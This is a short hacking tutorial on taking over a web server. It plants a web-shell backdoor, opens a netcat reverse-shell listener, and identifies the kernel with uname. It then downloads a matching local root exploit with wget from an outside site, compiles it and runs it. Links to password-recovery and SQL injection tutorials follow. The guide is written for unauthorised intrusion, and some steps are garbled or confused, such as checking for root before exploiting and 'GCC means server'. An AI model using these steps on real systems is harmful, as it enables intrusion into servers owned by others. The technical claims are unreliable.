r00ting a webhost
Introduction: Well taking over a host isnt as easy as you may think. There is a fairly big process involved and a lot of fidiling around. Below I will show you how to execute a Local Root Exploit successfully to gain r00t-acesss 😛

Step 1. In this step we will need to backdoor the host. To do this I recommend for beginners you use a shell such as mulci shell. Remember which port you choose and make sure it is portforwarded to ensure the host can connect to you.

Step 2. Now that we have backdoored the host we will now need to connect. To do this we will need to get a tool called netcat. You can find it here (

). Locate our netcat through CMD, To do this we will do the following.

Code:
CD Pathtonetcatdirectory

nc -l -n -v -p porthere
Once we have Netcat listening we will now navigate to back connect on mulci shell, Enter our IP and port and click Connect

Step 3. Now if you have done it correctly you will have connected to the server in your CMD. To see if you did it type “who” or “whoami” to see if you have the user “root”. If you do than you have done this correctly

Step 4. Now we need to find out what kernel our box is running. Type “uname -a”. You should get something like below:

Code:
 Linux server1.host.com 2.6.17 blah blah
If you do now we need to copy the kernel version and look for an exploit. Match up the version from this site with a list of exploits.
Code:
http://th3-0utl4ws.com/localroot/

Step 5. Once we have found a exploit we will download it.

Code:
wget http://exploit.com/whatever

Step 6. Now we have the exploit we need to compile it. To do this we will use GCC. GCC means server

Code:
gcc exploitname -o outputname

Step 7. Now to execute our exploit. We will type ./exploit. Well Done, You
have now successfully r00ted your first box.

credits to watchdog

Explore More

Yahoo password recovery method

A friend of ours asked us “is it possible to retrieve yahoo password”. On further discussion we found out that he was waiting to get the password from an old

Finding 0days in Web Applications

Most zero-day exploits in web applications are usually easier to find, study, and attack than actual services like a webserver due to the fact that a hacker does not need

Extensive SQL Injection Tutorial

( This is one of the most extensive and most usefull tutorials about this subject I’ve seen read this and you’ll be sure to get a beter understanding! ) TABLE